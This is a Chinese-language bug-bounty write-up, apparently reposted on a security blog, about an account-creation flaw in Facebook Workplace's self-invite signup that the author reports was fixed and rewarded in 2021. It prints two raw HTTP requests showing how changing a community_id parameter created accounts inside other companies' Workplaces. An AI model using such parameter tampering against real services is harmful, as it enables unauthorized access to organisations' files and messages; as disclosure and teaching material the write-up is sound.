实战 | 记一次价值27500美金的Facebook漏洞挖掘记录

2022-02-17 8,817

描述:

在 Workplace 中,管理员可以选择激活一个名为“自我邀请”的选项,该选项允许任何人在没有管理员验证的电子邮件地址的情况下进入。

信息:https://www.workplace.com/help/work/336227380906523

虽然,服务器没有正确验证注册时使用的电子邮件,允许通过未经管理员验证的电子邮件创建帐户。

这可能允许恶意用户访问公司的 Workplace 环境。但是,这只有在公司启用了自我邀请功能的情况下才有可能。

漏洞挖掘细节:

通过分析“Workplace from Facebook”Android 应用程序上的网络流量,我能够找到这个问题。

在我的 Workplace 中注册一个新帐户并修改 Burp Suite 历史选项卡后,我遇到了以下请求:

在对这个端点进行了一些测试后,我得出结论,只需修改“community_id”就可以在其他 Workplaces 中创建帐户 使用个人电子邮件帐户 (@gmail.com),已经可以执行该漏洞。

复现步骤:

请求激活码:

POST /at_work/accounts_send_notification HTTP/1.1
Host: graph.workplace.com
identifier=test@gmail.com
pre_login_flow_type=SIGNUP
access_token=*****

成功收到激活码。

2.创建 Facebook Workplace 帐户:

POST /at_work/accounts_self_invite HTTP/1.1
Host: graph.workplace.com
identifier=test@gmail.com
nonce=998236
community_id=86381-----------
form_data={"name":"Test","password":"Test1234@"}
access_token=*****

nonce:第一步的激活码。

community_id:目标公司的社区ID。

WOW!账号创建成功,现在攻击者可以自由访问目标公司的文件、照片、群组、邮件等数据。如果不计算员工的曝光率……

然而…

攻击者必须拥有目标公司社区的 ID。这有可能通过蛮力或公司的一些前雇员来解决。

在我收到赏金的几天后,我能够找到一个端点,它可以从 Workplace 中的任何公司提供 community_id。

漏洞披露时间线:

2021 年 1 月 11 日 — 初步报告 2021 年

1 月 25 日 — 分类 2021 年

2 月 9 日 — 错误修复 2021 年

2 月 23 日 — 奖励 (27500美金)


本文作者:HACK_Learn

本文为安全脉搏专栏作者发布,转载请注明:https://www.secpulse.com/archives/173512.html

Tags:
评论  (0)
快来写下你的想法吧!

HACK_Learn

文章数:142 积分: 323

微信公众号:HACK学习呀

安全问答社区

安全问答社区

脉搏官方公众号

脉搏公众号